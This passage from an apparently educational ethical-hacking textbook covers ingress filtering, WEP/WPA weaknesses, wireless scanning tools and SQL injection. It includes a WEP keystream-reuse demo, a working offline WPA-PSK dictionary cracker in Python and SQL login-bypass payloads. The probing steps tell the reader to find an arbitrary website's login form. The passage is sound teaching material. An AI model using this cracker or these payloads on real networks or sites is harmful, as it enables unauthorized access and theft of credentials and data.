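        """Return 'forward' or a 'drop:<reason>' string for one packet summary."""
        src = ipaddress.ip_address(pkt["src"])
        if any(src in net for net in BOGONS):
            return "drop:bogon-source"
        if not any(src in net for net in self.customer):
            return "drop:spoofed-source"        # BCP 38: not from this customer
        if pkt["proto"] == "icmp" and not self._icmp_allowed(now):
            return "drop:rate-limit"
        return "forward"


def run_sample():
    """Constructed traffic arriving from a customer whose prefix is
    203.0.113.0/24; returns the filter's decision for each packet."""
    flt = IngressFilter(["203.0.113.0/24"])
    packets = [
        {"src": "203.0.113.5", "proto": "tcp"},    # genuine customer host
        {"src": "198.51.100.7", "proto": "tcp"},   # spoofed: someone else's address
        {"src": "10.1.2.3", "proto": "udp"},       # RFC 1918 source: bogon
        {"src": "192.168.0.9", "proto": "tcp"},    # RFC 1918 source: bogon
    ]
    decisions = [flt.decide(p, now=0.0) for p in packets]
    # a burst of 30 echo requests in the same instant: the burst allowance of
    # 20 passes and the remaining 10 are dropped
    decisions += [flt.decide({"src": "203.0.113.5", "proto": "icmp"}, now=1.0)
                  for _ in range(30)]
    return decisions


if __name__ == "__main__":
    for d in run_sample():
        print(d)
```

The order of the checks matters: the source-address tests are cheap and stateless, so they run first and never consume rate-limit tokens, which keeps a spoofed flood from starving the customer's own legitimate ICMP. A filter like this on every access network is what makes the smurf and SYN floods of section 11.5, both of which depend on forged source addresses, impossible to launch from that network.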
CHAPTER 12
HACKING WIRELESS NETWORKS
Objective
12.1 Introduction to Wireless Networks
12.2 Overview of WEP, WPA
12.3 Techniques of Wireless Hacking
12.4 Methods of Securing Wireless Networks
12.5 Wireless Hacking Tools
12.1 Introduction[76]
Wireless networks add another entry point into a network for hackers.
Wireless is a relatively young technology with many known security
weaknesses. Because of the broadcast nature of radio frequency (RF)
wireless networks and the rapid adoption of wireless technologies for
home and business networks, many vulnerabilities and exploits exist.
Many home and office wireless networks are not protected by a password
or by any encryption protocol (open wireless networks), so anyone within
radio range can join them and read their unencrypted traffic.
[76] chmag.in
Case Study: The terror e-mails sent from the Wi-Fi connections of an
American national in Navi Mumbai and of Mumbai's Khalsa College are a
good example of the risk of open wireless networks and of the security
loopholes in wireless technology. Such networks can also be used for
identity theft and corporate espionage. Terror e-mails linked to the
July 2008 Ahmedabad bomb blasts were traced to American national Kenneth
Haywood's unsecured Wi-Fi network. Another terror e-mail sent in the
name of a terrorist group was traced to a computer at Mumbai's Khalsa
College.
Figure: statistics of open and insecure wireless networks in Pune.[77]
Most wireless LANs (WLANs) are based on the IEEE 802.11 standards and
amendments, such as 802.11a, 802.11b, 802.11g, and 802.11n. The original
802.11 standard included only rudimentary security features and was
fraught with vulnerabilities. The 802.11i amendment is the latest
security solution that addresses the 802.11 weaknesses. The Wi-Fi
Alliance created additional security certifications, known as Wi-Fi
Protected Access (WPA) and WPA2, to fill the gap between the original
802.11 standard and the 802.11i amendment. The security vulnerabilities
and security solutions discussed in this chapter are all based on these
IEEE and Wi-Fi Alliance standards.
[77] http://www.wardrive.in/2008/11/wardriving-pune
IEEE Wireless Standards
802.11    Release    Data rate per      Frequency        Indoor   Outdoor
protocol  date       stream (Mbit/s)                     range    range
--------  ---------  -----------------  ---------------  -------  -------
(legacy)  June 1997  1, 2               2.4 GHz          20 m     110 m
a         Sep 1999   54                 5 GHz / 3.7 GHz  35 m     120 m
b         Sep 1999   11                 2.4 GHz          35 m     140 m
g         June 2003  54                 2.4 GHz          70 m     250 m
n         Oct 2009   72.2               2.4 / 5 GHz      70 m     250 m
12.2 Overview of WEP, WPA Authentication Mechanisms, and Cracking
Techniques
Two methods exist for authenticating wireless LAN clients to an access
point: open system or shared key authentication. Open system does not
provide any security mechanism; it is simply a request to join the
network. Shared key authentication has the wireless client encrypt a
challenge string sent by the access point with the WEP key and return
it. Ironically, shared key authentication is the weaker of the two: an
eavesdropper who captures both the plaintext challenge and the
encrypted response obtains a piece of RC4 keystream for that IV, which
can then be used to forge a valid response without knowing the key.
Wired Equivalent Privacy (WEP) was the first security option for 802.11
WLANs. [78] WEP is used to encrypt data on the WLAN and can optionally be
paired with shared key authentication to authenticate WLAN clients. WEP
uses RC4 with a 64-bit or 128-bit key to encrypt the layer 2 data
payload. This key comprises a 40-bit or 104-bit user-defined key combined
with a 24-bit Initialization Vector (IV), making the RC4 key either 64 or
128 bits. The IV is transmitted in the clear in front of every encrypted
frame, so the only secret part is the 40- or 104-bit root key.
The process by which RC4 uses IVs is the real weakness of WEP: it allows
an attacker to crack the WEP key. The IV space is only 2^24 values, so
IVs inevitably repeat on a busy network and every repeated IV reuses the
same RC4 keystream; worse, certain "weak" IVs leak information about the
key bytes in the first bytes of keystream. The method known as the FMS
attack (Fluhrer, Mantin, and Shamir attack) uses those encrypted output
bytes from frames with weak IVs to determine the most probable key bytes.
It was incorporated into products like AirSnort, WEPCrack, and aircrack
to exploit the WEP vulnerability. Although an attacker can attempt to
crack WEP by brute force, the most common technique is the FMS attack;
its successor, the PTW attack (Tews, Weinmann and Pyshkin, 2007)
implemented in aircrack-ng, needs no weak IVs and recovers a 104-bit key
from tens of thousands of captured frames, typically in minutes when ARP
replay is used to generate traffic.
[78] en.wikipedia.org/wiki/Wired_Equivalent_Privacy
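The keystream reuse behind these attacks, as an added example that is not part of the original text: a minimal RC4 and WEP-style framing in Python. The RC4 routine implements the public algorithm; the root key, IV and the two frame bodies are constructed sample values, and the CRC-32 integrity value WEP appends is omitted because it does not change the argument. Two frames encrypted under the same key and the same IV share a keystream, so one known plaintext recovers the keystream for that IV and decrypts the other frame without the key; the birthday bound on the 24-bit IV shows how few frames that takes.

```python
"""WEP-style RC4 encryption with a 24-bit IV and why IV reuse leaks plaintext.
Added example, not from the original text: the RC4 routine implements the
public algorithm, and the root key, IV and frame bodies are constructed sample
values (the CRC-32 ICV that WEP appends is omitted; it does not change the
keystream argument)."""
import math


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream for `key` (KSA followed by PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):                          # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                       # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(root_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: the 3-byte IV travels in the clear and is prepended to
    the 40- or 104-bit root key to form the per-frame RC4 key."""
    assert len(iv) == 3 and len(root_key) in (5, 13)
    return iv + xor_bytes(plaintext, rc4_keystream(iv + root_key, len(plaintext)))


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack: ciphertext XOR plaintext is the keystream for
    the IV in this frame (an ARP or DHCP frame has a predictable header)."""
    return xor_bytes(frame[3:], known_plaintext)


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Decrypt any other frame that carries the same IV, root key unknown."""
    return xor_bytes(frame[3:], keystream)


def expected_frames_to_iv_collision(iv_bits: int = 24) -> int:
    """Birthday bound: about sqrt(pi/2 * 2^n) frames before two share an IV,
    even if the driver chose IVs at random (many drivers simply counted)."""
    return int(math.sqrt(math.pi / 2 * 2 ** iv_bits))


# Constructed sample values: a 104-bit ("128-bit WEP") root key and one IV.
ROOT_KEY = bytes.fromhex("0123456789abcdef0123456789")
IV = bytes.fromhex("0a0b0c")
# Two equal-length frame bodies starting with the fixed LLC/SNAP header
# (AA AA 03 00 00 00 + EtherType) that every WEP data frame carries.
FRAME1_PLAINTEXT = b"\xaa\xaa\x03\x00\x00\x00\x08\x06ARP request.."   # known to attacker
FRAME2_PLAINTEXT = b"\xaa\xaa\x03\x00\x00\x00\x08\x00user=bob&pw=s"   # the secret one


def demo() -> dict:
    """Frame 1's plaintext is known; frame 2 is recovered without the key."""
    f1 = wep_encrypt(ROOT_KEY, IV, FRAME1_PLAINTEXT)
    f2 = wep_encrypt(ROOT_KEY, IV, FRAME2_PLAINTEXT)
    keystream = recover_keystream(f1, FRAME1_PLAINTEXT)
    return {
        "iv_in_clear": f1[:3] == IV == f2[:3],
        "ciphertext_xor_is_plaintext_xor":
            xor_bytes(f1[3:], f2[3:]) == xor_bytes(FRAME1_PLAINTEXT, FRAME2_PLAINTEXT),
        "recovered_frame2": decrypt_with_keystream(f2, keystream),
        "frames_until_iv_repeats": expected_frames_to_iv_collision(),
    }
```

The FMS and PTW attacks go further than this: instead of waiting for a repeated IV they use statistical biases in RC4's first output bytes across many different IVs to vote on each key byte. The example shows why even a non-weak IV cannot be reused safely, which is the flaw TKIP removed by mixing a fresh key for every packet and extending the sequence counter to 48 bits.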
WPA employs the Temporal Key Integrity Protocol (TKIP), a safer use of
RC4 that mixes a fresh key for every packet and adds a message integrity
check (Michael), for data encryption, and either WPA Personal or WPA
Enterprise for authentication. WPA Personal uses an ASCII passphrase
(pre-shared key) for authentication, while WPA Enterprise uses a RADIUS
server to authenticate users. WPA Enterprise is the more robust security
option but relies on the creation and more complex setup of a RADIUS
server. TKIP rotates the data encryption key to remove the keystream
reuse and weak-IV problems of WEP and, consequently, the cracking
attacks built on them. WPA2 implements 802.11i and uses the Advanced
Encryption Standard (AES), in the CCMP mode, to encrypt the data
payload. No practical attack on AES itself is known, which is why
attacks on WPA2 target the passphrase and the handshake rather than the
cipher. WPA2 also allows the use of TKIP during a transitional period
called mixed mode security. This transitional mode means both TKIP and
AES can be used to encrypt data. AES requires more processing power,
which means low-end devices such as PDAs may only support TKIP. WPA
Personal and WPA2 Personal use a passphrase to authenticate WLAN
clients. WPA Enterprise and WPA2 Enterprise authenticate WLAN users via
a RADIUS server using the 802.1X/Extensible Authentication Protocol
(EAP) standards.
802.11i and WPA2 use the same encryption and authentication mechanisms.
However, WPA2 doesn't require vendors to implement preauthentication,
which 802.11i defines. Preauthentication enables fast, secure roaming,
which is necessary in very mobile environments with time-sensitive
applications such as wireless voice over IP.
Table 12.1 summarizes the authentication and encryption options for
WLANs.
TABLE 12.1 802.11 and WPA Security Solutions and Weaknesses

Standard | Encryption | Authentication | Weakness
Original IEEE 802.11 standard | WEP | WEP (shared key) | WEP IV weakness allows the WEP key to be cracked. The same key is used for encryption and authentication of all clients to the WLAN.
WPA | TKIP | Passphrase or RADIUS (802.1X/EAP) | Passphrase is susceptible to a dictionary attack.
WPA2 | AES (can use TKIP while in mixed mode) | Passphrase or RADIUS (802.1X/EAP) | Passphrase is susceptible to a dictionary attack.
IEEE 802.11i | AES (can use TKIP while in mixed mode) | Passphrase or RADIUS (802.1X/EAP) | Passphrase is susceptible to a dictionary attack.

In each of the passphrase modes the dictionary attack is offline: one
captured four-way handshake between a client and the AP is enough to
test candidate passphrases at leisure, without any further traffic to
the network, so the strength of the passphrase is the whole defense.
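The dictionary attack named in Table 12.1, as an added example that is not part of the original text, in Python. It follows the 802.11i key derivation (PBKDF2-HMAC-SHA1 for the PMK, PRF-512 for the PTK, and the HMAC-SHA1 key MIC used with AES-CCMP) and checks each candidate passphrase against the MIC of a captured handshake message. The SSID, MAC addresses, nonces, EAPOL frame bytes and word list are constructed here; a real attack takes those values from a packet capture of the four-way handshake.

```python
"""Offline dictionary attack on a WPA/WPA2-Personal passphrase using one
captured four-way handshake.  Added example, not from the original text: the
key derivation follows IEEE 802.11i (PBKDF2-HMAC-SHA1 -> PMK, PRF-512 -> PTK,
HMAC-SHA1 key MIC as used with AES-CCMP); the SSID, MAC addresses, nonces,
EAPOL frame bytes and word list are constructed sample values."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The SSID acts as the salt, which is why PMK tables are per network name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    Everything except the PMK is visible in the handshake capture."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key MIC for key-descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the
    EAPOL-Key frame with its MIC field zeroed, truncated to 16 bytes.  The KCK
    is the first 16 bytes of the PTK."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_mic_zeroed, captured_mic, wordlist):
    """Derive the MIC for each candidate passphrase and compare it with the MIC
    the client actually sent.  Returns the passphrase, or None if not listed."""
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_mic_zeroed), captured_mic):
            return candidate
    return None


# --- Constructed "capture" of message 2 of 4 (client -> AP) ---
SSID = "IQS-Lab"
AP_MAC = bytes.fromhex("001122334455")          # authenticator address (AA)
STA_MAC = bytes.fromhex("66778899aabb")         # supplicant address (SPA)
ANONCE = bytes(range(32))                       # sent by the AP in message 1
SNONCE = bytes(range(32, 64))                   # sent by the client in message 2
# Stand-in for the message-2 EAPOL-Key frame bytes with the MIC field zeroed;
# a real attack copies these bytes verbatim from the capture.
EAPOL_M2_ZEROED = bytes.fromhex("0103007502010a00") + b"\x00" * 8 + SNONCE + b"\x00" * 56 + b"\x00\x00"


def _client_mic(passphrase: str) -> bytes:
    """What the legitimate client computed; used only to build the sample capture."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_M2_ZEROED)


CAPTURED_MIC = _client_mic("letmein123")        # the attacker sees only this value
WORDLIST = ["password", "12345678", "iqs-lab", "letmein123", "qwertyuiop"]


def demo():
    return crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_M2_ZEROED, CAPTURED_MIC, WORDLIST)
```

The cost per guess is the 4096-iteration PBKDF2, which is why the aircrack-ng suite can precompute PMK tables per SSID (airolib-ng) and why GPU crackers are used; nothing in the attack touches the network after the single handshake capture, so the only defenses in these modes are a long random passphrase or moving to 802.1X/EAP.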
Overview of Wireless Sniffers and Locating SSIDs, MAC Spoofing [79]
A common attack on a WLAN involves eavesdropping or sniffing. This is an
easy attack to perform and usually occurs at hotspots or with any
default-installation access point (AP), because packets are generally
sent unencrypted across the WLAN. Passwords for network access protocols
such as FTP, POP3, and SMTP are then captured in clear text, meaning
unencrypted, by anyone with a wireless card in monitor mode within radio
range.
The SSID is the name of the WLAN and is advertised in beacon frames. If
two wireless networks are physically close, the SSIDs are used to
identify and differentiate the respective networks. The SSID is usually
sent in the clear in a beacon packet. Most APs allow the WLAN
administrator to hide the SSID by leaving it out of beacons. However,
this isn't a robust security mechanism, because the SSID still appears
in clear text in probe requests, probe responses and association
requests whenever a client joins, and tools such as Kismet read it from
those packets.
An early security solution in WLAN technology used MAC address filters:
a network administrator entered a list of valid MAC addresses for the
systems allowed to associate with the AP. MAC filters are cumbersome to
configure and aren't scalable for an enterprise network because they
must be configured on each AP. MAC spoofing is easy to perform and
negates the effort required to implement MAC filters. A hacker can
identify a valid MAC address because the MAC headers are never
encrypted: even on a WPA2 network, the source and destination addresses
of every frame are sent in the clear, so a sniffer lists the MAC
addresses of all associated clients.
[79] http://my.safaribooksonline.com/book/certification/ceh/9780470525203/wireless-network-hacking
12.3. Wireless Hacking Techniques [80]
Most wireless hacking attacks can be categorized as follows:
Cracking encryption and authentication mechanisms
These include cracking WEP, the WPA pre-shared key authentication
passphrase, and Cisco's Lightweight EAP authentication (LEAP). Hackers
can use the recovered keys or credentials to connect to the WLAN, or can
capture other users' data and decrypt it.
Eavesdropping or sniffing
This involves capturing passwords or other confidential information from
an unencrypted WLAN or hotspot.
Denial of Service
DoS can be performed at the physical layer by generating a louder RF
signal than the AP with an RF transmitter (jamming), so that the approved
AP is drowned out and users connect to a rogue AP instead. DoS can be
performed at the data link layer by flooding spoofed deauthentication or
disassociation frames (a deauth attack; these 802.11 management frames
carry no authentication in the standards this chapter covers, so any
station can forge them) or by continuously generating bogus frames
(Queensland attack).
AP masquerading or spoofing
Rogue APs pretend to be legitimate APs by using the same configured SSID
or network name.
MAC spoofing
The hacker pretends to be a legitimate WLAN client and bypasses MAC
filters by spoofing another user's MAC address.
Wireless networks give a hacker an easy way into the network if the AP
isn't secured properly. There are many ways to hack or exploit the
vulnerabilities of a WLAN.
[80] http://my.safaribooksonline.com/book/certification/ceh/9780470525203/wireless-network-hacking/wireless_hacking_techniques
12.4. Methods Used to Secure Wireless Networks
Because wireless networking is a relatively new technology compared to
wired networking technologies, fewer security options are available.
Security methods can be categorized by the applicable layer of the OSI
model.
Layer 2 or MAC layer security options are as follows:
o WPA
o WPA2
o 802.11i
Layer 3 or Network layer security options are as follows:
o IPSec or SSL VPN
Layer 7 or Application layer security options are as follows:
o Secure applications such as Secure Shell (SSH), HTTP over SSL (HTTPS),
and FTP over SSL (FTPS)
The layer 3 and layer 7 options protect the payload even if the WLAN
encryption is broken or absent, but they do not hide MAC addresses,
SSIDs or traffic volume, and they do nothing against the
deauthentication and jamming attacks above, so layer 2 security is still
required.
12.5. Wireless Hacking Tools
NetStumbler and Kismet are WLAN discovery tools. They both discover the
Media Access Control (MAC) address, Service Set Identifier (SSID),
security mode, and channel of the WLAN. Additionally, Kismet can discover
WLANs whose SSIDs are hidden, collect packets, and provide IDS
functionality.
NetStumbler is probably the first wireless discovery tool that people
come across. It is free, easy to install and simple to use. NetStumbler
is a tool for Windows that allows you to detect Wireless Local Area
Networks (WLANs) using 802.11b, 802.11a and 802.11g.
NetStumbler sends out a probe request about once a second and reports
the responses. This is known as active scanning. Because it transmits,
the scanner is itself visible to a wireless IDS, and an AP configured
not to answer broadcast probe requests will not appear in its list.
i. Using Netstumbler [81]
Once Netstumbler is installed all you need is a compatible wireless card;
simply double-click the Netstumbler icon and Netstumbler will start
probing for nearby wireless LANs.
One of the weaknesses of Netstumbler is its inability to detect wireless
LANs using hidden SSIDs.
However, Netstumbler does include a very useful graphical representation
of signal strength (indicated in green) and noise (indicated in red)
over time, which is extremely useful for direction-finding wireless
LANs. [82]
Netstumbler saves files in the .ns1 format. Provided a GPS device is
attached, these files can then be imported (via Stumbverter) into
Microsoft's MapPoint software to produce a graphic representation of any
wardriving or site surveys that may have been carried out.
[81] www.netstumbler.com/
[82] wirelessdefence.org
ii. Kismet
Kismet is a Linux-based wireless scanner. It's a handy tool for
surveying the wireless airwaves around you to find target wireless LANs
to crack. Kismet also captures traffic, but other tools such as
airodump-ng (part of the Aircrack-ng suite) do a better job in the
context of cracking WEP, so we'll be using it to make sure our wireless
card is working and for scanning for wireless networks. Unlike
Netstumbler, Kismet scans passively: it puts the card into monitor mode
and only listens, which is why it sees hidden SSIDs and why it is not
itself visible on the air.
You get to Kismet by clicking on the Programs icon, then Backtrack, then
Wireless, then Scanner/Analyzer, and finally Kismet.
In addition to scanning wireless networks, Kismet captures packets into
a file for later analysis, so it will ask for the directory to save the
captured files in. Click Desktop and then OK.
Specifying the Save Location
Kismet will then ask for a prefix for the captured files. Change the
default name to capture and then click OK.
As Kismet starts, it will display all the wireless networks in range,
which should include the target WLAN you set up. The channel number,
under the Ch column, should match what you have written down. If Kismet
has found many nearby access points, you may want to move the lab
farther away from those access points, or disconnect any high-gain
antennas you have connected. [83]
While Kismet is hopping through all the channels looking for interesting
information, you will see the number of packets changing for all the
access points. In the column at the right side of the screen, Kismet
displays the total number of networks found, the number of packets
captured and the number of encrypted packets seen.
Even with the target computer off, Kismet is detecting packets from our
AP. This is because APs send out "beacons", which tell wireless
computers that an AP is in range. You can think of it as the AP
announcing, "My name is XXXXX, please connect to me."
Likewise, many other wireless hacking tools are available; for more
information, look up wireless hacking tools on the internet.
[83] hackforums.net
*********************
ETHICAL HACKING
PART – II
INDEX
Ethical Hacking Part II
Content
Chapter 13
SQL Injection
1. Introduction
2. Steps for conducting SQL Injection
3. SQL Server Vulnerability
4. Countermeasures
Chapter 14
Evading IDS, Firewall and Honeypot
1. Introduction to IDS, Firewall, Honeypot
2. Use of IDS, Firewall, Honeypot Evading tools
Chapter 15
Penetration Testing
1. Introduction
2. Conducting Penetration Testing
3. Penetration Testing Methodology
4. Penetration Testing Steps
5. Penetration Testing Tools
6. Penetration Testing Report
Chapter 16
Shell Scripting
1. Introduction to Shell
2. Types of Shell
3. Scripting Language
4. Shell Scripting
Chapter 17
Viruses and Worms
1. Introduction
2. Scripting Language and Viruses
3. Internet Worms
Chapter 18
Proxy Server
1. Introduction
2. Use of Proxy Server for Attack
3. IP Address Spoofing
4. MAC Address Spoofing
Chapter 19
Rootkit
1. Introduction
2. Types of Rootkits
3. Planting Rootkits on Windows
4. Detecting Rootkits
Chapter 20
Web Application Security
1. Introduction
2. Hacking Web Server
3. Web Server Hardening Methods
4. Web Application Vulnerabilities
Chapter 21
Buffer Overflow Attack
1. Introduction
2. Types of Buffer Overflow
3. Buffer Overflow & Web Application
4. Countermeasures
Chapter 22
Mobile Security
1. Mobile Vulnerabilities
2. Mobile Phone Security Measures
3. Mobile Related Threats
4. Mobile Malware
5. Mobile Based Attacks
Chapter 23
Social Engineering
1. Introduction
2. Social Engineering Methods
3. Common Attacks
4. Countermeasures
References
CHAPTER 13
SQL Injection
Objective
13.1 Introduction
13.2 Threats of SQL Injection
13.3 SQL Injection Query
13.4 SQL Injection Vulnerabilities
13.5 Types of SQL Injection
13.6 Countermeasures
13.1 Introduction
Web applications allow legitimate website visitors to submit and
retrieve data to/from a database over the Internet using their
preferred web browser. Databases are central to modern websites: they
store the data needed for websites to deliver specific content to
visitors and render information to customers, suppliers, employees and a
host of stakeholders. User credentials, financial and payment
information, and company statistics may all be resident within a
database and accessed by legitimate users through off-the-shelf and
custom web applications. Web applications and databases are what allow
a business to run day to day.
A SQL injection attack consists of insertion or "injection" of a SQL query
via the input data from the client to the application. A successful SQL
injection exploit can read sensitive data from the database, modify
database data (Insert/Update/Delete), execute administration operations
on the database (such as shutdown the DBMS), recover the content of a
given file present on the DBMS file system and in some cases issue
commands to the operating system. SQL injection attacks are a type of
injection attack, in which SQL commands are injected into data-plane
input in order to effect the execution of predefined SQL commands. [84]
[84] www.owasp.org
SQL injection is a code injection technique that exploits a security
vulnerability occurring in the database layer of an application. The
vulnerability is present when user input is either incorrectly filtered
for string literal escape characters embedded in SQL statements or user
input is not strongly typed and is thereby unexpectedly executed.
[Figure: SQL injection attack illustration (source 85); image not reproduced]
SQL injection is an attack in which malicious code is inserted into
strings that are later passed to an instance of SQL Server for parsing
and execution. Any procedure that constructs SQL statements should be
reviewed for injection vulnerabilities, because SQL Server will execute
all syntactically valid queries that it receives. Even data that arrived
through a parameter is not safe if a stored procedure later concatenates
it into dynamic SQL (for example with EXEC); that is how a skilled and
determined attacker can still manipulate parameterized data.
The primary form of SQL injection consists of direct insertion of code into
user-input variables that are concatenated with SQL commands and
executed. A less direct attack injects malicious code into strings that are
destined for storage in a table or as metadata. When the stored strings
are subsequently concatenated into a dynamic SQL command, the
malicious code is executed.
The injection process works by prematurely terminating a text string and
appending a new command. Because the inserted command may have
additional strings appended to it before it is executed, the malefactor
terminates the injected string with a comment mark "--". Subsequent text
is ignored at execution time. [86]
[85] Figure source (image not reproduced): http://4.bp.blogspot.com/-fa9UxIPwaSg/T3DkFt-L7rI/AAAAAAAAAmg/U9968AW0b3k/s1600/SQL-Injection-Attack.jpg
During a SQL injection attack, malicious code is inserted into a web
form field or the website's code to make a system execute arbitrary SQL
commands or, through database features such as command execution
procedures, operating system commands. Just as a legitimate user enters
queries and additions to the SQL database via a web form, the hacker can
insert commands to the SQL server through the same web form field.
SQL Injection is one of the many web attack mechanisms used by hackers
to steal data from organizations. It is perhaps one of the most common
application layer attack techniques used today. It is the type of attack
that takes advantage of improper coding of your web applications, which
allows a hacker to inject SQL commands into, say, a login form and gain
access to the data held within your database.
For example, an arbitrary command from a hacker might open a command
prompt or display a table from the database. A database table may
contain personal information such as credit card numbers, social
security numbers, or passwords. SQL servers are very common database
servers and are used by many organizations to store confidential data.
This makes a SQL server a high value target and therefore a system that
is very attractive to hackers.
13.2 Threats of SQL Injection
SQL injection attacks allow attackers to spoof identity, tamper with
existing data, cause repudiation issues such as voiding transactions or
changing balances, allow the complete disclosure of all data on the
system, destroy the data or make it otherwise unavailable, and become
administrators of the database server.
SQL Injection is very common with PHP and ASP applications due to the
prevalence of older functional interfaces. Due to the nature of the
programmatic interfaces available, J2EE and ASP.NET applications are
less likely to have easily exploited SQL injections. [87] The language
does not remove the flaw, however: code in any language that builds a
query by concatenating untrusted input is injectable.
[86] http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx
[87] www.owasp.org/index.php/SQL_Injection
Not preventing SQL Injection attacks leaves your business at great risk
of:
o Changes to or deletion of highly sensitive business information
o Theft of customer information such as social security numbers,
addresses, and credit card numbers
o Financial losses
o Brand damage
o Theft of intellectual property
o Legal liability and fines [88]
13.3 SQL Injection Query
SQL Injection is the hacking technique which attempts to pass SQL
commands or statements through a web application for execution by the
backend database. If input is not sanitized properly, web applications
are open to SQL Injection attacks that allow hackers to view information
from the database and/or even wipe it out.
Such features as login pages, support and product request forms,
feedback forms, search pages, shopping carts and the general delivery of
dynamic content shape modern websites and provide businesses with the
means necessary to communicate with prospects and customers. These
website features are all susceptible to SQL Injection attacks, which
arise because the fields available for user input allow SQL statements
to pass through and query the database directly.
Before launching a SQL injection attack, the hacker determines whether
the configuration of the database and related tables and variables is
vulnerable. The steps to determine the SQL server's vulnerability are as
follows:
1. Using your web browser, find a website that uses a login page or
other database input or query fields (such as an "I forgot my password"
form). Look for forms that submit via POST or GET by checking the page's
source code.
2. Test the input with a single quote ('). Doing so indicates whether
the user-input variable is sanitized or interpreted literally by the
server. If the server responds with a database error message (an
unclosed quotation mark, a syntax error, or something similar), the
input most likely reaches the query unescaped and the application is
susceptible to a SQL injection attack.
3. Use the SELECT command to retrieve data from the database or the
INSERT command to add information to the database.
4. For example, entering Blah' OR 1=1 -- as the username turns the
application's own query into:
SELECT Count(*) FROM users WHERE UserName='Blah' OR 1=1 --'
The OR 1=1 makes the condition true for every row, and the -- comments
out whatever the application appended after the injected text.
[88] http://www.applicure.com/solutions/prevent-sql-injection-attacks
13.4 SQL Server Vulnerabilities
How does an attacker compromise your SQL server?
Before a web site can be compromised, an attacker needs to find
applications that are vulnerable to SQL injection using queries to learn
the SQL application methods and its response mechanisms.
The attacker has two ways to identify SQL injection vulnerabilities:
o Error messages: the attacker constructs the correct SQL syntax
based on errors messages propagated from the SQL server via
the front-end web application. Using the errors received, the
hacker learns the internal SQL database structure and how to
attack by injecting SQL queries via the Web application
parameters.
o Blind injection ("blindfolded" injection): this technique is used by
hackers in situations where no error messages or response content are
returned from the database. In these cases, the attacker cannot learn
the backend SQL queries from errors in order to balance the injected
query, and with no database content echoed in the web application must
find another channel for retrieving data, usually a true/false
difference in the page or a measurable delay in the response. [89]
[89] http://www.applicure.com/
SQL Injection: A Simple Example
Take a simple login page where a legitimate user would enter his
username and password combination to enter a secure area to view his
personal details or upload his comments in a forum.
When the legitimate user submits his details, an SQL query is generated
from these details and submitted to the database for verification. If valid,
the user is allowed access. In other words, the web application that
controls the login page will communicate with the database through a
series of planned commands so as to verify the username and password
combination. On verification, the legitimate user is granted appropriate
access.
Through SQL Injection, the hacker may input specifically crafted SQL
commands with the intent of bypassing the login form barrier and seeing
what lies behind it. This is only possible if the inputs are not properly
sanitized and sent directly with the SQL query to the database. SQL
Injection vulnerabilities provide the means for a hacker to communicate
directly to the database.
The technologies vulnerable to this attack are dynamic script languages
including ASP, ASP.NET, PHP, JSP, and CGI. All an attacker needs to
perform an SQL Injection attack is a web browser, knowledge of SQL
queries and creative guesswork about likely table and field names. The
sheer simplicity of SQL Injection has fuelled its popularity.
Here are some examples of field text you can enter on a web form to test
for SQL injection vulnerabilities:
Login: blah' or 1=1--
Password: blah' or 1=1--
These inputs and similar variations may allow the bypassing of a login,
depending on the structure of the query. When entered in a form field
they may return many rows in a table or even an entire database table,
because the SQL server interprets the quote as the end of the string and
the rest as SQL. The double dashes near the end of the input tell SQL
to ignore the rest of the statement as a comment.
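The bypass described above and the single-quote probe from the test steps in 13.3, as an added example that is not part of the original text: a login check written with string concatenation beside the same check using a parameterized query, run against an in-memory SQLite database. The table, the two accounts and the function names are constructed for illustration.

```python
"""Login check with string concatenation versus a parameterized query, run
against an in-memory SQLite database.  Added example, not from the original
text: the table, accounts and function names are constructed for illustration."""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("admin", "c0rrect-h0rse"), ("bob", "hunter2")])
    return db


def login_vulnerable(db, username, password):
    """User input is pasted into the SQL text.  A quote in the input closes the
    string literal and whatever follows is executed as SQL."""
    sql = ("SELECT Count(*) FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
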